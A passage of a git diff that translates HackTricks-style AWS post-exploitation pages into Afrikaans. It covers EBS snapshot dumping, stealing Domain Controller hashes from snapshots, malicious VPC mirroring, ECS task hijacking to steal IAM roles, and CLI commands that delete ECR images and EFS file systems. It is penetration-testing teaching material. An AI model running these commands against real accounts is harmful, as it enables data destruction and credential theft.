+ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region)
 
-    instance_volumes = enumerate_ec2_instances(ec2_client)
-    all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
-    snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
-    wait_for_snapshots(ec2_client, snapshot_ids)
-    create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn)
-    replace_volumes(ec2_client, instance_volumes)
-    delete_snapshots(ec2_client, snapshot_ids)
+instance_volumes = enumerate_ec2_instances(ec2_client)
+all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
+snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
+wait_for_snapshots(ec2_client, snapshot_ids)
+create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn)
+replace_volumes(ec2_client, instance_volumes)
+delete_snapshots(ec2_client, snapshot_ids)
 
 if __name__ == "__main__":
-    main()
+main()
 ```
-
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md
index 7a9a19cc4..075784d07 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md
@@ -2,8 +2,7 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## Checking a snapshot locally
-
+## Kontroleer 'n snapshot plaaslik
 ```bash
 # Install dependencies
 pip install 'dsnap[cli]'
@@ -32,10 +31,8 @@ cd dsnap
 make docker/build
 IMAGE="<download_file>.img" make docker/run #With the snapshot downloaded
 ```
-
 > [!CAUTION]
-> **Note** that `dsnap` will not allow you to download public snapshots. To circumvent this, you can make a copy of the snapshot in your personal account, and download that:
-
+> **Let wel** dat `dsnap` jou nie sal toelaat om openbare snappings af te laai nie. Om dit te omseil, kan jy 'n kopie van die snapshot in jou persoonlike rekening maak, en dit aflaai:
 ```bash
 # Copy the snapshot
 aws ec2 copy-snapshot --source-region us-east-2 --source-snapshot-id snap-09cf5d9801f231c57 --destination-region us-east-2 --description "copy of snap-09cf5d9801f231c57"
@@ -49,59 +46,55 @@ dsnap --region us-east-2 get snap-027da41be451109da
 # Delete the snapshot after downloading
 aws ec2 delete-snapshot --snapshot-id snap-027da41be451109da --region us-east-2
 ```
+Vir meer inligting oor hierdie tegniek, kyk na die oorspronklike navorsing in [https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/](https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/)
 
-For more info on this technique check the original research in [https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/](https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/)
-
-You can do this with Pacu using the module [ebs\_\_download_snapshots](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#ebs__download_snapshots)
-
-## Checking a snapshot in AWS
+Jy kan dit met Pacu doen deur die module [ebs\_\_download_snapshots](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#ebs__download_snapshots) te gebruik.
 
+## Kontroleer 'n snapshot in AWS
 ```bash
 aws ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id snap-0b49342abd1bdcb89
 ```
+**Monteer dit in 'n EC2 VM onder jou beheer** (dit moet in dieselfde streek wees as die kopie van die rugsteun):
 
-**Mount it in a EC2 VM under your control** (it has to be in the same region as the copy of the backup):
+Stap 1: 'n Nuwe volume van jou verkiesde grootte en tipe moet geskep word deur na EC2 –> Volumes te gaan.
 
-Step 1: A new volume of your preferred size and type is to be created by heading over to EC2 –> Volumes.
+Om hierdie aksie uit te voer, volg hierdie opdragte:
 
-To be able to perform this action, follow these commands:
+- Skep 'n EBS-volume om aan die EC2-instantie te koppel.
+- Verseker dat die EBS-volume en die instantie in dieselfde sone is.
 
-- Create an EBS volume to attach to the EC2 instance.
-- Ensure that the EBS volume and the instance are in the same zone.
+Stap 2: Die "koppel volume" opsie moet gekies word deur regs te klik op die geskepte volume.
 
-Step 2: The "attach volume" option is to be selected by right-clicking on the created volume.
+Stap 3: Die instantie uit die instantie teksvak moet gekies word.
 
-Step 3: The instance from the instance text box is to be selected.
+Om hierdie aksie uit te voer, gebruik die volgende opdrag:
 
-To be able to perform this action, use the following command:
+- Koppel die EBS-volume.
 
-- Attach the EBS volume.
+Stap 4: Teken in op die EC2-instantie en lys die beskikbare skywe met die opdrag `lsblk`.
 
-Step 4: Login to the EC2 instance and list the available disks using the command `lsblk`.
+Stap 5: Kontroleer of die volume enige data het met die opdrag `sudo file -s /dev/xvdf`.
 
-Step 5: Check if the volume has any data using the command `sudo file -s /dev/xvdf`.
+As die uitvoer van die bogenoemde opdrag "/dev/xvdf: data" toon, beteken dit dat die volume leeg is.
 
-If the output of the above command shows "/dev/xvdf: data", it means the volume is empty.
+Stap 6: Formateer die volume na die ext4 lêerstelsel met die opdrag `sudo mkfs -t ext4 /dev/xvdf`. Alternatiewelik kan jy ook die xfs-formaat gebruik deur die opdrag `sudo mkfs -t xfs /dev/xvdf` te gebruik. Neem asseblief kennis dat jy of ext4 of xfs moet gebruik.
 
-Step 6: Format the volume to the ext4 filesystem using the command `sudo mkfs -t ext4 /dev/xvdf`. Alternatively, you can also use the xfs format by using the command `sudo mkfs -t xfs /dev/xvdf`. Please note that you should use either ext4 or xfs.
+Stap 7: Skep 'n gids van jou keuse om die nuwe ext4-volume te monteer. Byvoorbeeld, jy kan die naam "newvolume" gebruik.
 
-Step 7: Create a directory of your choice to mount the new ext4 volume. For example, you can use the name "newvolume".
+Om hierdie aksie uit te voer, gebruik die opdrag `sudo mkdir /newvolume`.
 
-To be able to perform this action, use the command `sudo mkdir /newvolume`.
+Stap 8: Monteer die volume na die "newvolume" gids met die opdrag `sudo mount /dev/xvdf /newvolume/`.
 
-Step 8: Mount the volume to the "newvolume" directory using the command `sudo mount /dev/xvdf /newvolume/`.
+Stap 9: Verander gids na die "newvolume" gids en kontroleer die skyfspasie om die volume-montage te valideer.
 
-Step 9: Change directory to the "newvolume" directory and check the disk space to validate the volume mount.
+Om hierdie aksie uit te voer, gebruik die volgende opdragte:
 
-To be able to perform this action, use the following commands:
+- Verander gids na `/newvolume`.
+- Kontroleer die skyfspasie met die opdrag `df -h .`. Die uitvoer van hierdie opdrag moet die vrye spasie in die "newvolume" gids toon.
 
-- Change directory to `/newvolume`.
-- Check the disk space using the command `df -h .`. The output of this command should show the free space in the "newvolume" directory.
-
-You can do this with Pacu using the module `ebs__explore_snapshots`.
-
-## Checking a snapshot in AWS (using cli)
+Jy kan dit met Pacu doen deur die module `ebs__explore_snapshots` te gebruik.
 
+## Kontroleer 'n snapshot in AWS (met cli)
 ```bash
 aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id <snap-0b49342abd1bdcb89>
 
@@ -127,19 +120,14 @@ sudo mount /dev/xvdh1 /mnt
 
 ls /mnt
 ```
-
 ## Shadow Copy
 
-Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project.
+Enige AWS-gebruiker wat die **`EC2:CreateSnapshot`** toestemming het, kan die hashes van alle domein gebruikers steel deur 'n **snapshot van die Domeinbeheerder** te skep, dit aan 'n instansie wat hulle beheer te koppel en die **NTDS.dit en SYSTEM** registrasie hives lêer te **eksporteer** vir gebruik met Impacket se secretsdump projek.
 
-You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot.
+Jy kan hierdie hulpmiddel gebruik om die aanval te outomatiseer: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) of jy kan een van die vorige tegnieke gebruik nadat jy 'n snapshot geskep het.
 
 ## References
 
 - [https://devopscube.com/mount-ebs-volume-ec2-instance/](https://devopscube.com/mount-ebs-volume-ec2-instance/)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md
index eb3b5f33f..63ad1afc6 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md
@@ -2,18 +2,14 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-**Check** [**https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws**](https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws) **for further details of the attack!**
+**Check** [**https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws**](https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws) **vir verdere besonderhede van die aanval!**
 
-Passive network inspection in a cloud environment has been **challenging**, requiring major configuration changes to monitor network traffic. However, a new feature called “**VPC Traffic Mirroring**” has been introduced by AWS to simplify this process. With VPC Traffic Mirroring, network traffic within VPCs can be **duplicated** without installing any software on the instances themselves. This duplicated traffic can be sent to a network intrusion detection system (IDS) for **analysis**.
+Passiewe netwerkinspeksie in 'n wolkomgewing was **uitdagend**, wat groot konfigurasiewijzigings vereis het om netwerkverkeer te monitor. 'n Nuwe kenmerk genaamd “**VPC Traffic Mirroring**” is egter deur AWS bekendgestel om hierdie proses te vereenvoudig. Met VPC Traffic Mirroring kan netwerkverkeer binne VPC's **gedupliseer** word sonder om enige sagteware op die instansies self te installeer. Hierdie gedupliseerde verkeer kan na 'n netwerkindringingsdeteksiesisteem (IDS) gestuur word vir **analise**.
 
-To address the need for **automated deployment** of the necessary infrastructure for mirroring and exfiltrating VPC traffic, we have developed a proof-of-concept script called “**malmirror**”. This script can be used with **compromised AWS credentials** to set up mirroring for all supported EC2 instances in a target VPC. It is important to note that VPC Traffic Mirroring is only supported by EC2 instances powered by the AWS Nitro system, and the VPC mirror target must be within the same VPC as the mirrored hosts.
+Om die behoefte aan **geoutomatiseerde ontplooiing** van die nodige infrastruktuur vir spieëling en ekfiltrering van VPC-verkeer aan te spreek, het ons 'n bewys-van-konsep-skrip genaamd “**malmirror**” ontwikkel. Hierdie skrip kan gebruik word met **gekompromitteerde AWS-akkrediteer** om spieëling op te stel vir alle ondersteunde EC2-instanties in 'n teiken VPC. Dit is belangrik om te noem dat VPC Traffic Mirroring slegs ondersteun word deur EC2-instanties wat deur die AWS Nitro-stelsel aangedryf word, en die VPC-spieëlteiken moet binne dieselfde VPC wees as die gespieëlde gasheer.
 
-The **impact** of malicious VPC traffic mirroring can be significant, as it allows attackers to access **sensitive information** transmitted within VPCs. The **likelihood** of such malicious mirroring is high, considering the presence of **cleartext traffic** flowing through VPCs. Many companies use cleartext protocols within their internal networks for **performance reasons**, assuming traditional man-in-the-middle attacks are not possible.
+Die **impak** van kwaadwillige VPC-verkeer spieëling kan beduidend wees, aangesien dit aanvallers toelaat om toegang te verkry tot **sensitiewe inligting** wat binne VPC's oorgedra word. Die **waarskynlikheid** van sulke kwaadwillige spieëling is hoog, gegewe die teenwoordigheid van **duidelike teksverkeer** wat deur VPC's vloei. Baie maatskappye gebruik duidelike teksprotokolle binne hul interne netwerke vir **prestasie redes**, met die aanname dat tradisionele man-in-the-middle-aanvalle nie moontlik is nie.
 
-For more information and access to the [**malmirror script**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror), it can be found on our **GitHub repository**. The script automates and streamlines the process, making it **quick, simple, and repeatable** for offensive research purposes.
+Vir meer inligting en toegang tot die [**malmirror skrip**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror), kan dit op ons **GitHub-bewaarplek** gevind word. Die skrip outomatiseer en stroomlyn die proses, wat dit **vinning, eenvoudig en herhaalbaar** maak vir offensiewe navorsingsdoeleindes.
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md
index a971ea769..948664aad 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md
@@ -4,14 +4,13 @@
 
 ## ECR
 
-For more information check
+Vir meer inligting, kyk
 
 {{#ref}}
 ../aws-services/aws-ecr-enum.md
 {{#endref}}
 
-### Login, Pull & Push
-
+### Teken in, Trek & Stoot
 ```bash
 # Docker login into ecr
 ## For public repo (always use us-east-1)
@@ -38,17 +37,16 @@ docker push <account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latest
 # Downloading without Docker
 # List digests
 aws ecr batch-get-image --repository-name level2 \
-    --registry-id 653711331788 \
-    --image-ids imageTag=latest | jq '.images[].imageManifest | fromjson'
+--registry-id 653711331788 \
+--image-ids imageTag=latest | jq '.images[].imageManifest | fromjson'
 
 ## Download a digest
 aws ecr get-download-url-for-layer \
-    --repository-name level2 \
-    --registry-id 653711331788 \
-    --layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a"
+--repository-name level2 \
+--registry-id 653711331788 \
+--layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a"
 ```
-
-After downloading the images you should **check them for sensitive info**:
+Na die aflaai van die beelde moet jy **hulle vir sensitiewe inligting nagaan**:
 
 {{#ref}}
 https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics
@@ -56,25 +54,24 @@ https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-m
 
 ### `ecr:PutLifecyclePolicy` | `ecr:DeleteRepository` | `ecr-public:DeleteRepository` | `ecr:BatchDeleteImage` | `ecr-public:BatchDeleteImage`
 
-An attacker with any of these permissions can **create or modify a lifecycle policy to delete all images in the repository** and then **delete the entire ECR repository**. This would result in the loss of all container images stored in the repository.
-
+'n Aanvaller met enige van hierdie toestemmings kan **'n lewensiklusbeleid skep of wysig om alle beelde in die repository te verwyder** en dan **die hele ECR-repository te verwyder**. Dit sal lei tot die verlies van alle houerbeelde wat in die repository gestoor is.
 ```bash
 bashCopy code# Create a JSON file with the malicious lifecycle policy
 echo '{
-  "rules": [
-    {
-      "rulePriority": 1,
-      "description": "Delete all images",
-      "selection": {
-        "tagStatus": "any",
-        "countType": "imageCountMoreThan",
-        "countNumber": 0
-      },
-      "action": {
-        "type": "expire"
-      }
-    }
-  ]
+"rules": [
+{
+"rulePriority": 1,
+"description": "Delete all images",
+"selection": {
+"tagStatus": "any",
+"countType": "imageCountMoreThan",
+"countNumber": 0
+},
+"action": {
+"type": "expire"
+}
+}
+]
 }' > malicious_policy.json
 
 # Apply the malicious lifecycle policy to the ECR repository
@@ -92,9 +89,4 @@ aws ecr batch-delete-image --repository-name your-ecr-repo-name --image-ids imag
 # Delete multiple images from the ECR public repository
 aws ecr-public batch-delete-image --repository-name your-ecr-repo-name --image-ids imageTag=latest imageTag=v1.0.0
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md
index 1d2fd80a5..534beb164 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md
@@ -4,7 +4,7 @@
 
 ## ECS
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-ecs-enum.md
@@ -12,42 +12,37 @@ For more information check:
 
 ### Host IAM Roles
 
-In ECS an **IAM role can be assigned to the task** running inside the container. **If** the task is run inside an **EC2** instance, the **EC2 instance** will have **another IAM** role attached to it.\
-Which means that if you manage to **compromise** an ECS instance you can potentially **obtain the IAM role associated to the ECR and to the EC2 instance**. For more info about how to get those credentials check:
+In ECS kan 'n **IAM rol aan die taak** toegeken word wat binne die houer loop. **As** die taak binne 'n **EC2** instance loop, sal die **EC2 instance** 'n **ander IAM** rol aan hom geheg hê.\
+Dit beteken dat as jy daarin slaag om 'n **kompromie** van 'n ECS instance te maak, jy potensieel die **IAM rol wat aan die ECR en aan die EC2 instance** gekoppel is, kan **verkry**. Vir meer inligting oor hoe om daardie akrediteer te verkry, kyk:
 
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
 {{#endref}}
 
 > [!CAUTION]
-> Note that if the EC2 instance is enforcing IMDSv2, [**according to the docs**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), the **response of the PUT request** will have a **hop limit of 1**, making impossible to access the EC2 metadata from a container inside the EC2 instance.
+> Let daarop dat as die EC2 instance IMDSv2 afdwing, [**volgens die dokumentasie**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), die **antwoord van die PUT versoek** 'n **hop limiet van 1** sal hê, wat dit onmoontlik maak om toegang tot die EC2 metadata vanaf 'n houer binne die EC2 instance te verkry.
 
 ### Privesc to node to steal other containers creds & secrets
 
-But moreover, EC2 uses docker to run ECs tasks, so if you can escape to the node or **access the docker socket**, you can **check** which **other containers** are being run, and even **get inside of them** and **steal their IAM roles** attached.
+Maar verder, gebruik EC2 docker om ECs take te laat loop, so as jy kan ontsnap na die node of **toegang tot die docker socket** kan kry, kan jy **kontroleer** watter **ander houers** aan die gang is, en selfs **binne hulle gaan** en **hulle IAM rolle** steel.
 
 #### Making containers run in current host
 
-Furthermore, the **EC2 instance role** will usually have enough **permissions** to **update the container instance state** of the EC2 instances being used as nodes inside the cluster. An attacker could modify the **state of an instance to DRAINING**, then ECS will **remove all the tasks from it** and the ones being run as **REPLICA** will be **run in a different instance,** potentially inside the **attackers instance** so he can **steal their IAM roles** and potential sensitive info from inside the container.
-
+Boonop sal die **EC2 instance rol** gewoonlik genoeg **toestemmings** hê om die **toestand van die houer instance** van die EC2 instances wat as nodes binne die kluster gebruik word, te **opdateer**. 'n Aanvaller kan die **toestand van 'n instance na DRAINING** verander, dan sal ECS **alle take daarvan verwyder** en diegene wat as **REPLICA** loop, sal in 'n ander instance **loop**, potensieel binne die **aanvaller se instance** sodat hy **hulle IAM rolle** en potensieel sensitiewe inligting van binne die houer kan **steel**.
 ```bash
 aws ecs update-container-instances-state \
-    --cluster <cluster> --status DRAINING --container-instances <container-instance-id>
+--cluster <cluster> --status DRAINING --container-instances <container-instance-id>
 ```
-
-The same technique can be done by **deregistering the EC2 instance from the cluster**. This is potentially less stealthy but it will **force the tasks to be run in other instances:**
-
+Die dieselfde tegniek kan gedoen word deur **die EC2-instantie uit die kluster te deregistreer**. Dit is potensieel minder stil, maar dit sal **die take dwing om in ander instanties uitgevoer te word:**
 ```bash
 aws ecs deregister-container-instance \
-    --cluster <cluster> --container-instance <container-instance-id> --force
+--cluster <cluster> --container-instance <container-instance-id> --force
 ```
-
-A final technique to force the re-execution of tasks is by indicating ECS that the **task or container was stopped**. There are 3 potential APIs to do this:
-
+'n Finale tegniek om die heruitvoering van take te dwing, is deur aan ECS aan te dui dat die **taak of houer gestop is**. Daar is 3 potensiële API's om dit te doen:
 ```bash
 # Needs: ecs:SubmitTaskStateChange
 aws ecs submit-task-state-change --cluster <value> \
-    --status STOPPED --reason "anything" --containers [...]
+--status STOPPED --reason "anything" --containers [...]
 
 # Needs: ecs:SubmitContainerStateChange
 aws ecs submit-container-state-change ...
@@ -55,13 +50,8 @@ aws ecs submit-container-state-change ...
 # Needs: ecs:SubmitAttachmentStateChanges
 aws ecs submit-attachment-state-changes ...
 ```
+### Steel sensitiewe inligting uit ECR houers
 
-### Steal sensitive info from ECR containers
-
-The EC2 instance will probably also have the permission `ecr:GetAuthorizationToken` allowing it to **download images** (you could search for sensitive info in them).
+Die EC2-instantie sal waarskynlik ook die toestemming `ecr:GetAuthorizationToken` hê wat dit toelaat om **beelde af te laai** (jy kan sensitiewe inligting daarin soek). 
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md
index 35b644689..93a0b5d15 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md
@@ -4,7 +4,7 @@
 
 ## EFS
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-efs-enum.md
@@ -12,47 +12,35 @@ For more information check:
 
 ### `elasticfilesystem:DeleteMountTarget`
 
-An attacker could delete a mount target, potentially disrupting access to the EFS file system for applications and users relying on that mount target.
-
+'n Aanvaller kan 'n mount target verwyder, wat moontlik toegang tot die EFS-lêerstelsel vir toepassings en gebruikers wat op daardie mount target staatmaak, kan ontwrig.
 ```sql
 aws efs delete-mount-target --mount-target-id <value>
 ```
-
-**Potential Impact**: Disruption of file system access and potential data loss for users or applications.
+**Potensiële Impak**: Ontwrichting van lêerstelsels toegang en potensiële dataverlies vir gebruikers of toepassings.
 
 ### `elasticfilesystem:DeleteFileSystem`
 
-An attacker could delete an entire EFS file system, which could lead to data loss and impact applications relying on the file system.
-
+'n Aanvaller kan 'n hele EFS-lêerstelsel verwyder, wat kan lei tot dataverlies en 'n impak op toepassings wat op die lêerstelsel staatmaak.
 ```perl
 aws efs delete-file-system --file-system-id <value>
 ```
-
-**Potential Impact**: Data loss and service disruption for applications using the deleted file system.
+**Potensiële Impak**: Gegevensverlies en diensonderbreking vir toepassings wat die verwyderde lêerstelsel gebruik.
 
 ### `elasticfilesystem:UpdateFileSystem`
 
-An attacker could update the EFS file system properties, such as throughput mode, to impact its performance or cause resource exhaustion.
-
+'n Aanvaller kan die EFS-lêerstelsel eienskappe opdateer, soos deurgangmodus, om die prestasie daarvan te beïnvloed of hulpbronuitputting te veroorsaak.
 ```sql
 aws efs update-file-system --file-system-id <value> --provisioned-throughput-in-mibps <value>
 ```
+**Potensiële Impak**: Afname in lêerstelsels se prestasie of hulpbronuitputting.
 
-**Potential Impact**: Degradation of file system performance or resource exhaustion.
-
-### `elasticfilesystem:CreateAccessPoint` and `elasticfilesystem:DeleteAccessPoint`
-
-An attacker could create or delete access points, altering access control and potentially granting themselves unauthorized access to the file system.
+### `elasticfilesystem:CreateAccessPoint` en `elasticfilesystem:DeleteAccessPoint`
 
+'n Aanvaller kan toegangspunte skep of verwyder, wat toegangbeheer verander en moontlik onregmatige toegang tot die lêerstelsel aan hulself verleen.
 ```arduino
 aws efs create-access-point --file-system-id <value> --posix-user <value> --root-directory <value>
 aws efs delete-access-point --access-point-id <value>
 ```
-
-**Potential Impact**: Unauthorized access to the file system, data exposure or modification.
+**Potensiële Impak**: Onbevoegde toegang tot die lêerstelsel, data blootstelling of wysiging.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md
index eb1f77f46..bcd15110a 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md
@@ -4,110 +4,101 @@
 
 ## EKS
 
-For mor information check
+Vir meer inligting, kyk
 
 {{#ref}}
 ../aws-services/aws-eks-enum.md
 {{#endref}}
 
-### Enumerate the cluster from the AWS Console
+### Enumereer die kluster vanaf die AWS Console
 
-If you have the permission **`eks:AccessKubernetesApi`** you can **view Kubernetes objects** via AWS EKS console ([Learn more](https://docs.aws.amazon.com/eks/latest/userguide/view-workloads.html)).
+As jy die toestemming **`eks:AccessKubernetesApi`** het, kan jy **Kubernetes-objekte** via die AWS EKS-console **bekyk** ([Leer meer](https://docs.aws.amazon.com/eks/latest/userguide/view-workloads.html)).
 
-### Connect to AWS Kubernetes Cluster
-
-- Easy way:
+### Verbinde met AWS Kubernetes Kluster
 
+- Maklike manier:
 ```bash
 # Generate kubeconfig
 aws eks update-kubeconfig --name aws-eks-dev
 ```
+- Nie so maklik nie:
 
-- Not that easy way:
-
-If you can **get a token** with **`aws eks get-token --name <cluster_name>`** but you don't have permissions to get cluster info (describeCluster), you could **prepare your own `~/.kube/config`**. However, having the token, you still need the **url endpoint to connect to** (if you managed to get a JWT token from a pod read [here](aws-eks-post-exploitation.md#get-api-server-endpoint-from-a-jwt-token)) and the **name of the cluster**.
-
-In my case, I didn't find the info in CloudWatch logs, but I **found it in LaunchTemaplates userData** and in **EC2 machines in userData also**. You can see this info in **userData** easily, for example in the next example (the cluster name was cluster-name):
+As jy **'n token kan kry** met **`aws eks get-token --name <cluster_name>`** maar jy het nie toestemming om cluster inligting te kry nie (describeCluster), kan jy **jou eie `~/.kube/config` voorberei**. Maar, met die token, moet jy steeds die **url eindpunt om te verbind** (as jy daarin geslaag het om 'n JWT token van 'n pod te kry, lees [hier](aws-eks-post-exploitation.md#get-api-server-endpoint-from-a-jwt-token)) en die **naam van die cluster**.
 
+In my geval, het ek nie die inligting in CloudWatch logs gevind nie, maar ek **het dit in LaunchTemplates userData gevind** en in **EC2 masjiene in userData ook**. Jy kan hierdie inligting maklik in **userData** sien, byvoorbeeld in die volgende voorbeeld (die cluster naam was cluster-name):
 ```bash
 API_SERVER_URL=https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-east-1.eks.amazonaws.com
 
 /etc/eks/bootstrap.sh cluster-name --kubelet-extra-args '--node-labels=eks.amazonaws.com/sourceLaunchTemplateVersion=1,alpha.eksctl.io/cluster-name=cluster-name,alpha.eksctl.io/nodegroup-name=prd-ondemand-us-west-2b,role=worker,eks.amazonaws.com/nodegroup-image=ami-002539dd2c532d0a5,eks.amazonaws.com/capacityType=ON_DEMAND,eks.amazonaws.com/nodegroup=prd-ondemand-us-west-2b,type=ondemand,eks.amazonaws.com/sourceLaunchTemplateId=lt-0f0f0ba62bef782e5 --max-pods=58' --b64-cluster-ca $B64_CLUSTER_CA --apiserver-endpoint $API_SERVER_URL --dns-cluster-ip $K8S_CLUSTER_DNS_IP --use-max-pods false
 ```
-
 <details>
 
-<summary>kube config</summary>
-
+<summary>kube konfig</summary>
 ```yaml
 describe-cache-parametersapiVersion: v1
 clusters:
-  - cluster:
-      certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUMvakNDQWVhZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJeU1USXlPREUyTWpjek1Wb1hEVE15TVRJeU5URTJNamN6TVZvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTDlXCk9OS0ZqeXZoRUxDZGhMNnFwWkMwa1d0UURSRVF1UzVpRDcwK2pjbjFKWXZ4a3FsV1ZpbmtwOUt5N2x2ME5mUW8KYkNqREFLQWZmMEtlNlFUWVVvOC9jQXJ4K0RzWVlKV3dzcEZGbWlsY1lFWFZHMG5RV1VoMVQ3VWhOanc0MllMRQpkcVpzTGg4OTlzTXRLT1JtVE5sN1V6a05pTlUzSytueTZSRysvVzZmbFNYYnRiT2kwcXJSeFVpcDhMdWl4WGRVCnk4QTg3VjRjbllsMXo2MUt3NllIV3hhSm11eWI5enRtbCtBRHQ5RVhOUXhDMExrdWcxSDBqdTl1MDlkU09YYlkKMHJxY2lINjYvSTh0MjlPZ3JwNkY0dit5eUNJUjZFQURRaktHTFVEWUlVSkZ4WXA0Y1pGcVA1aVJteGJ5Nkh3UwpDSE52TWNJZFZRRUNQMlg5R2c4Q0F3RUFBYU5aTUZjd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZQVXFsekhWZmlDd0xqalhPRmJJUUc3L0VxZ1hNQlVHQTFVZEVRUU8KTUF5Q0NtdDFZbVZ5Ym1WMFpYTXdEUVlKS29aSWh2Y05BUUVMQlFBRGdnRUJBS1o4c0l4aXpsemx0aXRPcGcySgpYV0VUSThoeWxYNWx6cW1mV0dpZkdFVVduUDU3UEVtWW55eWJHbnZ5RlVDbnczTldMRTNrbEVMQVE4d0tLSG8rCnBZdXAzQlNYamdiWFovdWVJc2RhWlNucmVqNU1USlJ3SVFod250ZUtpU0J4MWFRV